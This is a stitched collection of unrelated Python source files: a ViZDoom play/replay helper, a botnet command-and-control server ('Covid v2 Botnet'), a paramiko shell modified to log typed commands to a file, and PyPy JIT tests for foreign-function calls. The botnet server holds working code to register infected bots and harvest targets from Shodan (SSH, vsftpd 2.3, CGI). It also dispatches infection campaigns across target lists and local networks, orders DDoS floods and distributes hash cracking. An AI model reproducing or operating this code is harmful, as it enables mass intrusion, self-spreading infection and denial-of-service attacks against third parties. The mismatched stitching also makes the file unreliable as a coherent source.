if action not in self._current_actions:
self._current_actions.append(action)
def _keyboard_on_release(self, key):
action = self._key_to_action(key)
if action is not None:
if action in self._current_actions:
self._current_actions.remove(action)
# noinspection PyProtectedMember
@staticmethod
def play_human_mode(env, skip_frames=1, num_episodes=3, num_actions=None):
from pynput.keyboard import Listener
doom = env.unwrapped
doom.skip_frames = 1 # handled by this script separately
# noinspection PyProtectedMember
def start_listener():
with Listener(on_press=doom._keyboard_on_press, on_release=doom._keyboard_on_release) as listener:
listener.join()
listener_thread = Thread(target=start_listener)
listener_thread.start()
for episode in range(num_episodes):
doom.mode = 'human'
env.reset()
last_render_time = time.time()
time_between_frames = 1.0 / 35.0
total_rew = 0.0
while not doom.game.is_episode_finished() and not doom._terminate:
num_actions = 14 if num_actions is None else num_actions
turn_delta_action_idx = num_actions - 1
actions = [0] * num_actions
for action in doom._current_actions:
if isinstance(action, int):
actions[action] = 1 # 1 for buttons currently pressed, 0 otherwise
else:
if action == 'turn_left':
actions[turn_delta_action_idx] = -doom.delta_actions_scaling_factor
elif action == 'turn_right':
actions[turn_delta_action_idx] = doom.delta_actions_scaling_factor
for frame in range(skip_frames):
doom._actions_flattened = actions
_, rew, _, _ = env.step(actions)
new_total_rew = total_rew + rew
if new_total_rew != total_rew:
log.info('Reward: %.3f, total: %.3f', rew, new_total_rew)
total_rew = new_total_rew
state = doom.game.get_state()
verbose = True
if state is not None and verbose:
info = doom.get_info()
print(
'Health:', info['HEALTH'],
# 'Weapon:', info['SELECTED_WEAPON'],
# 'ready:', info['ATTACK_READY'],
# 'ammo:', info['SELECTED_WEAPON_AMMO'],
# 'pc:', info['PLAYER_COUNT'],
# 'dmg:', info['DAMAGECOUNT'],
)
time_since_last_render = time.time() - last_render_time
time_wait = time_between_frames - time_since_last_render
if doom.show_automap and state.automap_buffer is not None:
map_ = state.automap_buffer
map_ = np.swapaxes(map_, 0, 2)
map_ = np.swapaxes(map_, 0, 1)
cv2.imshow('ViZDoom Automap Buffer', map_)
if time_wait > 0:
                        cv2.waitKey(int(time_wait * 1000))
else:
if time_wait > 0:
time.sleep(time_wait)
last_render_time = time.time()
if doom.show_automap:
cv2.destroyAllWindows()
log.debug('Press ESC to exit...')
listener_thread.join()
# noinspection PyProtectedMember
@staticmethod
def replay(env, rec_path):
doom = env.unwrapped
doom.mode = 'replay'
doom._ensure_initialized()
doom.game.replay_episode(rec_path)
episode_reward = 0
start = time.time()
while not doom.game.is_episode_finished():
doom.game.advance_action()
r = doom.game.get_last_reward()
episode_reward += r
log.info('Episode reward: %.3f, time so far: %.1f s', episode_reward, time.time() - start)
log.info('Finishing replay')
doom.close()
|
server.py
|
#!/usr/bin/python3
import socket
import threading
import time
import os
import subprocess
from hash_identify import *
import re
import attack_list
import local_network_attack
import json
import os
import signal
import shodan
from termcolor import colored
import pyfiglet
#configure:
API_KEY = "" #shodan api key
executable="executable to infect with"
wordlist_len=0# wordlist length
cnc_ip = "your cnc ip"
cnc_port = 8080 #your cnc ip port, default is 8080
#############################################################################
global bots
bots = []
global waiting
waiting = False
global cracking
cracking = False
global targets
targets=[]
logs = []
global local_attack_var
local_attack_var=None
global list_attack_var
list_attack_var = None
global serv
serv = None
global pid
pid = None
class bot(): #bot class to save in bots list
def __init__(self,addr,port,id_num,status=True):
self.addr = addr
self.port = port
self.id_num = id_num
self.status = status
@classmethod
def from_json(self,json_data):
return bot(json_data['addr'],json_data['port'],json_data['id_num'],False)
def setOnline(self):
self.status = True
def setOffline(self):
self.status = False
def to_string(self):
return "id: %s addr: %s port: %s status: %s" % (self.id_num,self.addr,self.port,self.status)
def dump(self):
return {'addr':self.addr,'port':self.port,'id_num':self.id_num}
########### utils ################################
def get_work(workers, leng=wordlist_len): #returns work array for workers length
res = leng / workers
start = 0
end = int(res)
lst = []
for i in range(workers):
to_append = [int(start),int(end)]
lst.append(to_append)
end += int(res)
start += int(res)
if (i == (workers - 1)):
if (lst[len(lst)-1][1] != leng):
lst.append([start,leng])
return lst
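# Worked example for get_work (illustrative numbers, not part of the original script):
#   get_work(3, 10) -> [[0, 3], [3, 6], [6, 9], [9, 10]]
# each online bot gets a [start, end) slice of the wordlist; the trailing [9, 10]
# entry covers the remainder left over by the integer division.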
def waiting_cmd():
global waiting
if waiting:
print("\n>>> ",end = '')
def get_online_bots():
global bots
leng = 0
for bot in bots:
if bot.status == True:
leng +=1
return leng
def get_online_bots_lst():
global bots
ret = []
for bot in bots:
if bot.status == True:
ret.append(bot)
return ret
########### return message analysis: ###############
def infected(message,conn,addr): #incoming infection
global bots
arr = message.split(" ")
port = int(arr[1])
addr = addr[0]
#addr,public_addr,port,id_num,status
print(colored(("new infection connection from: %s %s" % (addr,port)),'green'))
if not infectedip(addr,port):
b = bot(addr, port, len(bots))
bots.append(b)
conn.send(str(len(bots) -1).encode())
conn.close()
else:
for b in bots:
if b.addr == addr:
conn.send(str(b.id_num).encode())
conn.close()
b.setOnline()
return
conn.send("hey, too much".encode())
conn.close()
def analyze_scan(message,conn,addr):
print(message)
conn.close()
def pong(conn,addr):
conn.send("pong".encode())
conn.close()
########### commands: ###################
def show_targets(): #prints targets
global targets
index = 1
print(colored(("--------------%s targets:------------" % (len(targets))),'blue'))
for target in targets:
print(colored(("[%s] %s"%(index,target)),'blue'))
index +=1
def valid_ip(addr): #checks if the ip is valid
    # keep the octet pattern on one logical line; a triple-quoted regex would
    # embed newlines and whitespace and never match a real address
    regex = (r'^(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.'
             r'(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.'
             r'(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.'
             r'(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)$')
    return re.search(regex, addr)
def add_targets(): #gets ips to insert to targets
global targets
global waiting
waiting=True
addr = input("enter target ip or list of ips (ip,ip) \n>>> ")
if "," in addr:
try:
lst = addr.split(",")
for addr in lst:
if valid_ip(addr) and not infectedip(addr) and addr not in targets:
targets.append(addr)
else:
print(colored(("target %s is infected or not a real ip address..." % (addr)),'yello'))
except:
print(colored("invalid syntax of list",'red'))
else:
if not infectedip(addr) and valid_ip(addr) and addr not in targets:
targets.append(addr)
else:
print(colored("target %s is infected or not a real ip address...",'yellow') % (addr))
show_targets()
def clean_targets(): #deletes targets
global targets
res = input("there are %s targets, you sure you want to remove them? [Y/n]")
if res.lower() == 'n':
return
targets = []
def search_targets(): #shodan targets search
global targets
global bots
try:
api = shodan.Shodan(API_KEY)
query = "ssh port:22"
result = api.search(query)
ip_list = []
for service in result['matches']:
ip_list.append(service['ip_str'])
query = "vsftpd 2.3 port:21"
result = api.search(query)
for service in result['matches']:
ip_list.append(service['ip_str'])
query = "http cgi port:80"
result = api.search(query)
for service in result['matches']:
ip_list.append(service['ip_str'])
for ip in targets:
if ip in ip_list:
ip_list.remove(ip)
for bot in bots:
            if bot.addr in ip_list:  # bot objects only track addr; there is no public_addr attribute
ip_list.remove(bot.public_addr)
inp = input("Found %s new targets, do you want to add them? [Y/n]" % len(ip_list))
if inp == "n":
return
targets = ip_list
except Exception as e:
print("error: %s" % str(e))
return
def infectedip(addr,port=0): #check if ip is infected
global bots
for bot in bots:
if port==0:
return bot.addr == addr
if bot.addr == addr and bot.port == port:
return True
return False
def ping(bot): #send ping to a bot
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((bot.addr, bot.port))
sock.settimeout(5.0)
sock.send("ping".encode())
data = sock.recv(1024)
sock.close()
msg = data.decode('utf-8').strip('\r\n')
if msg == "pong":
return True
else:
return False
except:
return False
def check_alive(): #pinging bots to check who is alive
global bots
for i in bots:
print(colored(("\n[*] checking bot %s" % (i.to_string())),'yellow'))
if not ping(i):
print(colored(("[-] bot offline %s" % (i.to_string())),'red'))
i.setOffline()
else:
print(colored(("[+] bot online %s" % (i.to_string())),'green'))
i.setOnline()
def bots_status(): #prints bots list
global bots
if not bots:
return colored("\n[-] no bots :( ... \n",'yellow')
l = colored('\n---bots:\n','blue')
for i in bots:
l += colored(("[+] %s" % (i.to_string())),'blue')
l += colored('\n','blue')
return l
def help(): #prints help message
menu = colored('\n--menu:\n','green')
menu += colored("[+] {status}: show bots status\n",'green')
menu += colored("[+] {update}: pings each bot and checks for status\n",'green')
menu += colored("[+] {show targets}: shows the target list \n",'green')
menu += colored("[+] {add targets}: add targets to the target list \n",'green')
menu += colored("[+] {search targets}: searches targets from shodan\n",'green')
menu += colored("[+] {clear targets}: clears the target list \n",'green')
menu += colored("[+] {crack}: uses the bots to crack a hash\n",'green')
menu += colored("[+] {ddos}: uses the bots to ddos a given ip\n",'green')
menu += colored("[+] {list attack}: give bots and server (if selected so) targets from target list to attack\n",'green')
menu += colored("[+] {stop list attack}: commands the bots and server to stop running list attack \n",'green')
menu += colored("[+] {local attack}: sends bots and server (if selected so) command to attack all ips on local network\n",'green')
menu += colored("[+] {stop local attack}: commands the bots and server to stop running local attack \n",'green')
menu += colored("[+] {exit()}: closes server, saves the target list and bots list\n",'green')
menu += colored("[+] {help}: print this menu\n",'green')
return menu
def crack(): #start hash cracking
global bots
global cracking
global waiting
if cracking:
print("a cracking progress is still on, wait for it ti finish")
return
check_alive()
workers_len = get_online_bots()
if workers_len == 0:
print("no bots online")
return
waiting=True
hash_str = input("enter a hash to crack \n>>> ")
res = check_hash(hash_str)
if "hash not avialbe" in res:
print(res)
return
print("possible hashes:")
for i in range(len(res)):
print("[%s] %s" % (i+1,res[i]))
while True:
hash_type = input("enter a hash number or different hash name (enter exit to exit) \n>>> ")
if hash_type == "exit":
return
if len(hash_type) == 1:
if ord(hash_type) >= 48 and ord(hash_type) <= 57 and ((ord(hash_type) - 49) < len(res)) and ((ord(hash_type) - 49) >= 0):
hash_type = res[ord(hash_type) - 49]
if not hash_type in hashlib.algorithms_available:
print("hash not avialbe or index out of range")
else:
break
print("chosen type:",hash_type)
cracking = True
job = get_work(workers_len)
for i in range(workers_len):
cmd = "crack %s %s %s %s" % (hash_str, hash_type,job[i][0], job[i][1])
send_message(bots[i],cmd)
def stop_cracking():
global bots
global cracking
for bot in bots:
send_message(bot, "stop crack")
cracking = False
def local_attack(): #handling local attack
global local_attack_var
inpt = input("including me? [N/y]")
include = False
if inpt.lower() == 'y':
if local_attack_var:
if local_attack_var.status:
print(colored("im attacking right now... ",'yellow'))
else:
include=True
else:
include = True
check_alive()
global bots
for bot in bots:
send_message(bot,"local attack")
if include:
local_attack_var = local_network_attack
x = threading.Thread(target=local_attack_var.scan_and_attack, args=(cnc_ip,cnc_port,executable,True,False,"server"))
x.setDaemon(True)
x.start()
def stop_local_attack():
check_alive()
global bots
global local_attack_var
if local_attack_var:
local_attack_var.stop()
for bot in bots:
send_message(bot,"stop local attack")
def list_attack(): #give bots targets to attack from the list
global targets
global bots
global list_attack_var
check_alive()
workers_len = get_online_bots()
include=False
if len(targets) <=0:
print(colored("WTF no targets! add some targets!",'red'))
return
inpt = input("including me? [N/y]")
if inpt.lower() == 'y':
if list_attack_var:
if list_attack_var.status:
print(colored("im attacking right now... ",'yellow'))
else:
workers_len += 1
include=True
else:
workers_len += 1
include=True
if workers_len <= 0:
print(colored("no attack can be done because there are no workers!",'red'))
return
if len(targets) <= workers_len:
leng = len(targets)
if include:
leng -=1
index = 0
if bots != []:
for i in targets:
if bots[index].status:
send_message(bots[index],"list attack %s" % i)
index +=1
if index >= len(targets):
return
if include:
list_attack_var=attack_list
x = threading.Thread(target=list_attack_var.attack_list, args=(targets[len(targets) -1 ],cnc_ip,cnc_port,executable,False,False,"server"))
x.setDaemon(True)
x.start()
else:
job = get_work(workers_len,len(targets))
leng = len(job)
ret = get_online_bots_lst()
if include:
leng -=1
for i in range(leng):
lst_to_send = []
for j in range(job[i][0],job[i][1]):
lst_to_send.append(targets[j])
index = i
send_message(ret[i],"list attack %s" % (','.join(lst_to_send)))
if include:
lst_to_send=[]
for i in range(job[leng][0],job[leng][1]):
lst_to_send.append(targets[i])
list_attack_var = attack_list
x = threading.Thread(target=list_attack_var.attack_list, args=(lst_to_send,cnc_ip,cnc_port,executable,False,False,"server"))
x.setDaemon(True)
x.start()
targets = []
def stop_list_attack():
global bots
for bot in bots:
send_message(bot,"stop list attack")
global list_attack_var
if list_attack_var:
list_attack_var.stop()
def ddos(): #sends bots to start ddos attack on a specific ip
global bots
target = input("[*] enter the ip you want to KILL: ",)
if valid_ip(target):
check_alive()
for bot in bots:
send_message(bot,"ddos %s" % target)
else:
print(color("[-] ERROR: not a valid ip!",'red'))
def stop_ddos():
global bots
check_alive()
for bot in bots:
send_message(bot,"stop ddos")
print(colored("[+] sent the bots stop command",'green'))
############## server settings: ####################
def send_message(bot, msg): #sends message to a given bot
if bot.status == True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((bot.addr, bot.port))
sock.send(msg.encode())
sock.close()
except:
print(colored("[-] error sending message %s to bot %s" % (msg, bot.id_num)),'red')
def on_message(message,conn,addr): #handle new message
print(colored(("\n\n[+] got message %s %s %s" % (message,"from",addr)),'blue'))
if message.startswith("infected:"):
infected(message,conn,addr)
elif message.startswith("scan resaults:"):
analyze_scan(message,conn,addr)
elif message.startswith("cracked"):
stop_cracking()
elif message == "ping":
pong(conn,addr)
else:
pass
waiting_cmd()
def listening_loop(serv): #loop to receive new messages
while True:
conn, addr = serv.accept()
data = conn.recv(1024)
if not data:
break
msg = data.decode('utf-8').strip('\r\n')
x = threading.Thread(target=on_message, args=(msg,conn,addr))
x.start()
def listen(): #starts the cnc server and simplehttpserver
global serv
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serv.bind((cnc_ip, cnc_port))
serv.listen(1)
res = pyfiglet.figlet_format("Covid v2 Botnet",font = "slant")
print(colored(res,'green'))
print(colored(("[+] started a new server on: %s %s" % (serv.getsockname()[0], serv.getsockname()[1])),'green'))
PORT = 80
devnull = open(os.devnull, 'w')
pro = subprocess.Popen(["python","-m","SimpleHTTPServer",str(PORT),">","/dev/null", "2>&1"],stdout=devnull,stderr=devnull)
global pid
pid = pro.pid
print(colored(("[+] started the simple http server at port %s" % PORT),'green'))
x = threading.Thread(target=listening_loop, args=(serv,))
x.setDaemon(True)
x.start()
def load_targets(): #loads targets from targets.json
global targets
try:
with open("targets.json",'r',encoding='utf-8') as f:
data = json.loads(f.read())
for i in data:
targets.append(i)
print(colored(('[+] loaded %s targets'%len(targets)),'green'))
except:
print(colored("[-] error in loading targets",'yellow'))
def save_targets(): #saves targets to targets.json
global targets
try:
with open("targets.json",'w') as f:
json.dump(targets,f)
print(colored('[+] saved targets','green'))
except:
print(colored('[-] error in saving targets','red'))
def load_bots(): #loads bots from bots.json
global bots
try:
with open("bots.json",'r',encoding='utf-8') as f:
data = json.loads(f.read())
for i in data:
bots.append(bot.from_json(i))
check_alive()
print(colored(('[+] bots online: %s'%get_online_bots()),'green'))
except:
print(colored("[-] error in loading bots",'yellow'))
def save_bots(): #saves bots to bots.json
global bots
try:
with open("bots.json",'w') as f:
json.dump([o.dump() for o in bots],f)
print(colored(("[+] saved %s bots" %len(bots)),'green'))
except:
print(colored('[-] error saving bots!','red'))
############## main controller: ####################
def main():
global waiting
    listen()  # start server
load_bots()
load_targets()
while True:
waiting = True
command = input("whats your next command :} ? (type help for menu) \n>>> ")
if len(command) > 1:
waiting = False
if command == "help":
print(help())
elif command == "status":
print(bots_status())
elif command == "update":
check_alive()
print(bots_status())
elif command == "crack":
crack()
elif command == "stop crack":
stop_cracking()
elif command == "show targets":
show_targets()
elif command == "add targets":
add_targets()
elif command == "local attack":
local_attack()
elif command == "stop local attack":
stop_local_attack()
elif command == "list attack":
list_attack()
elif command == "stop list attack":
stop_list_attack()
elif command == "search targets":
search_targets()
elif command == "clean targets":
clean_targets()
elif command == "ddos":
ddos()
elif command == "stop ddos":
stop_ddos()
elif command == "exit()":
save_bots()
save_targets()
global serv
serv.close()
global pid
os.killpg(os.getpgid(pid), signal.SIGTERM)
exit()
main()
|
interactive.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
import socket
import sys
import time
from paramiko.py3compat import u
# windows does not have termios...
try:
import termios
import tty
has_termios = True
except ImportError:
has_termios = False
def interactive_shell(chan):
if has_termios:
posix_shell(chan)
else:
windows_shell(chan)
def posix_shell(chan):
import select
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
        # record the commands typed by the user
        records = []
        f = open('record.log', 'a+')
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if len(x) == 0:
sys.stdout.write('\r\n*** EOF\r\n')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
                # the following block is the modification that logs each command
                if x == '\r':
                    ftime = time.strftime('%Y-%m-%d %H:%M:%S')
                    cmd = ''.join(records).replace('\r', '\n')
                    log = '%s : %s\n' % (ftime, cmd)
                    f.write(log)
                    records = []
                else:
                    records.append(x)
                if len(x) == 0:
                    break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
f.close()
# thanks to Mike Looijmans for this code
def windows_shell(chan):
import threading
sys.stdout.write("Line-buffered terminal emulation. Press F6 or ^Z to send EOF.\r\n\r\n")
def writeall(sock):
while True:
data = sock.recv(256)
if not data:
sys.stdout.write('\r\n*** EOF ***\r\n\r\n')
sys.stdout.flush()
break
sys.stdout.write(data)
sys.stdout.flush()
writer = threading.Thread(target=writeall, args=(chan,))
writer.start()
try:
while True:
d = sys.stdin.read(1)
if not d:
break
chan.send(d)
except EOFError:
# user hit ^Z or F6
pass
|
test_ffi.py
|
import sys, py
from pypy.module.pypyjit.test_pypy_c.test_00_model import BaseTestPyPyC
class Test__ffi(BaseTestPyPyC):
def test__ffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
i = 0
res = 0
while i < 300:
tmp = pow(2, 3) # ID: fficall
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
if 'ConstClass(pow)' in repr(loop): # e.g. OS/X
pow_addr = 'ConstClass(pow)'
assert loop.match_by_id('fficall', """
guard_not_invalidated(descr=...)
i17 = force_token()
setfield_gc(p0, i17, descr=<.* .*PyFrame.vable_token .*>)
f21 = call_release_gil(%s, 2.000000, 3.000000, descr=<Callf 8 ff EF=7>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""" % pow_addr)
def test__ffi_call_frame_does_not_escape(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
def mypow(a, b):
return pow(a, b)
i = 0
res = 0
while i < 300:
tmp = mypow(2, 3)
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
opnames = log.opnames(loop.allops())
# we only force the virtualref, not its content
assert opnames.count('new_with_vtable') == 1
def test__ffi_call_releases_gil(self):
from rpython.rlib.clibffi import get_libc_name
def main(libc_name, n):
import time
import os
from threading import Thread
#
if os.name == 'nt':
from _rawffi.alt import WinDLL, types
libc = WinDLL('Kernel32.dll')
sleep = libc.getfunc('Sleep', [types.uint], types.uint)
delays = [0]*n + [1000]
else:
from _rawffi.alt import CDLL, types
libc = CDLL(libc_name)
sleep = libc.getfunc('sleep', [types.uint], types.uint)
delays = [0]*n + [1]
#
def loop_of_sleeps(i, delays):
for delay in delays:
sleep(delay) # ID: sleep
#
threads = [Thread(target=loop_of_sleeps, args=[i, delays]) for i in range(5)]
start = time.time()
for i, thread in enumerate(threads):
thread.start()
for thread in threads:
thread.join()
end = time.time()
return end - start
log = self.run(main, [get_libc_name(), 200], threshold=150,
import_site=True)
assert 1 <= log.result <= 1.5 # at most 0.5 seconds of overhead
loops = log.loops_by_id('sleep')
assert len(loops) == 1 # make sure that we actually JITted the loop
def test__ffi_struct(self):
def main():
from _rawffi.alt import _StructDescr, Field, types
fields = [
Field('x', types.slong),
]
descr = _StructDescr('foo', fields)
struct = descr.allocate()
i = 0
while i < 300:
x = struct.getfield('x') # ID: getfield
x = x+1
struct.setfield('x', x) # ID: setfield
i += 1
return struct.getfield('x')
#
log = self.run(main, [])
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('getfield', """
guard_not_invalidated(descr=...)
i57 = getfield_raw_i(i46, descr=<FieldS dynamic 0>)
""")
assert loop.match_by_id('setfield', """
setfield_raw(i44, i57, descr=<FieldS dynamic 0>)
""")
def test__cffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BInt = _cffi_backend.new_primitive_type("int")
BPow = _cffi_backend.new_function_type([BDouble, BInt], BDouble)
ldexp = libm.load_function(BPow, 'ldexp')
i = 0
res = 0
while i < 300:
tmp = ldexp(1, 3) # ID: cfficall
res += tmp
i += 1
BLong = _cffi_backend.new_primitive_type("long")
ldexp_addr = int(_cffi_backend.cast(BLong, ldexp))
return ldexp_addr, res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
ldexp_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
f97 = call_release_gil_f(91, i59, 1.0, 3, descr=<Callf 8 fi EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""", ignore_ops=['guard_not_invalidated'])
def test__cffi_call_c_int(self):
if sys.platform == 'win32':
py.test.skip("not tested on Windows (this test must pass on "
"other platforms, and it should work the same way)")
def main():
import os
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libc = _cffi_backend.load_library(None)
BInt = _cffi_backend.new_primitive_type("int")
BClose = _cffi_backend.new_function_type([BInt], BInt)
_dup = libc.load_function(BClose, 'dup')
i = 0
fd0, fd1 = os.pipe()
while i < 300:
tmp = _dup(fd0) # ID: cfficall
os.close(tmp)
i += 1
os.close(fd0)
os.close(fd1)
BLong = _cffi_backend.new_primitive_type("long")
return 42
#
log = self.run(main, [])
assert log.result == 42
loop, = log.loops_by_filename(self.filepath)
if sys.maxint > 2**32:
extra = "i98 = int_signext(i97, 4)"
else:
extra = ""
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
i97 = call_release_gil_i(91, i59, i50, descr=<Calli 4 i EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
%s
""" % extra, ignore_ops=['guard_not_invalidated'])
def test__cffi_call_size_t(self):
if sys.platform == 'win32':
py.test.skip("not tested on Windows (this test must pass on "
"other platforms, and it should work the same way)")
def main():
import os
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libc = _cffi_backend.load_library(None)
BInt = _cffi_backend.new_primitive_type("int")
BSizeT = _cffi_backend.new_primitive_type("size_t")
BChar = _cffi_backend.new_primitive_type("char")
BCharP = _cffi_backend.new_pointer_type(BChar)
BWrite = _cffi_backend.new_function_type([BInt, BCharP, BSizeT],
BSizeT) # not signed here!
_write = libc.load_function(BWrite, 'write')
i = 0
fd0, fd1 = os.pipe()
buffer = _cffi_backend.newp(BCharP, 'A')
while i < 300:
tmp = _write(fd1, buffer, 1) # ID: cfficall
assert tmp == 1
assert os.read(fd0, 2) == 'A'
i += 1
os.close(fd0)
os.close(fd1)
return 42
#
log = self.run(main, [])
assert log.result == 42
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
i97 = call_release_gil_i(91, i59, i10, i12, 1, descr=<Calli . iii EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
p98 = call_r(ConstClass(fromrarith_int__r_uint), i97, descr=<Callr . i EF=4>)
guard_no_exception(descr=...)
""", ignore_ops=['guard_not_invalidated'])
def test_cffi_call_guard_not_forced_fails(self):
# this is the test_pypy_c equivalent of
# rpython/jit/metainterp/test/test_fficall::test_guard_not_forced_fails
#
# it requires cffi to be installed for pypy in order to run
def main():
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
typedef void (*functype)(int);
int foo(int n, functype func);
""")
lib = ffi.verify("""
#include <signal.h>
typedef void (*functype)(int);
int foo(int n, functype func) {
if (n >= 2000) {
func(n);
}
return n*2;
}
""")
@ffi.callback("functype")
def mycallback(n):
if n < 5000:
return
# make sure that guard_not_forced fails
d = {}
f = sys._getframe()
while f:
d.update(f.f_locals)
f = f.f_back
n = 0
while n < 10000:
res = lib.foo(n, mycallback) # ID: cfficall
# this is the real point of the test: before the
# refactor-call_release_gil branch, the assert failed when
# res == 5000
assert res == n*2
n += 1
return n
log = self.run(main, [], import_site=True,
discard_stdout_before_last_line=True) # <- for Win32
assert log.result == 10000
loop, = log.loops_by_id('cfficall')
assert loop.match_by_id('cfficall', """
...
i1 = call_release_gil_i(..., descr=<Calli 4 ii EF=7 OS=62>)
...
""")
def test__cffi_bug1(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BSin = _cffi_backend.new_function_type([BDouble], BDouble)
sin = libm.load_function(BSin, 'sin')
def f(*args):
for i in range(300):
sin(*args)
f(1.0)
f(1)
#
libm_name = get_libm_name(sys.platform)
self.run(main, [libm_name])
# assert did not crash
def test_cffi_init_struct_with_list(self):
def main(n):
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
struct s {
short x;
short y;
short z;
};
""")
for i in xrange(n):
ffi.new("struct s *", [i, i, i])
log = self.run(main, [300])
loop, = log.loops_by_filename(self.filepath)
assert loop.match("""
i106 = getfield_gc_i(p20, descr=...)
i161 = int_lt(i106, i43)
guard_true(i161, descr=...)
i162 = int_add(i106, 1)
p110 = getfield_gc_r(p16, descr=...)
setfield_gc(p20, i162, descr=...)
guard_value(p110, ConstPtr(ptr111), descr=...)
guard_not_invalidated(descr=...)
p163 = force_token()
p164 = force_token()
p118 = getfield_gc_r(p16, descr=...)
p120 = getarrayitem_gc_r(p118, 0, descr=...)
guard_value(p120, ConstPtr(ptr121), descr=...)
p122 = getfield_gc_r(p120, descr=...)
guard_value(p122, ConstPtr(ptr123), descr=...)
p125 = getfield_gc_r(p16, descr=...)
guard_nonnull_class(p125, ..., descr=...)
p127 = getfield_gc_r(p125, descr=...)
guard_value(p127, ConstPtr(ptr128), descr=...)
p129 = getfield_gc_r(p127, descr=...)
guard_value(p129, ConstPtr(ptr130), descr=...)
p132 = call_r(ConstClass(_ll_0_alloc_with_del___), descr=...)
guard_no_exception(descr=...)
p133 = force_token()
p134 = new_with_vtable(descr=...)
setfield_gc(p134, ..., descr=...)
setfield_gc(p134, ConstPtr(null), descr=...)
setfield_gc(p48, p134, descr=...)
setfield_gc(p132, ..., descr=...)
i138 = call_i(ConstClass(_ll_1_raw_malloc_varsize_zero__Signed), 6, descr=...)
check_memory_error(i138)
setfield_gc(p132, i138, descr=...)
setfield_gc(p132, ConstPtr(ptr139), descr=...)
setfield_gc(p132, -1, descr=...)
setfield_gc(p0, p133, descr=...)
call_may_force_n(ConstClass(_ll_2_gc_add_memory_pressure__Signed_pypy_module__cffi_backend_cdataobj_W_CDataNewStdPtr), 6, p132, descr=...)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
i144 = int_add(i138, 0)
i146 = int_signext(i106, 2)
i147 = int_ne(i106, i146)
guard_false(i147, descr=...)
setarrayitem_raw(i144, 0, i106, descr=...)
i150 = int_add(i138, 2)
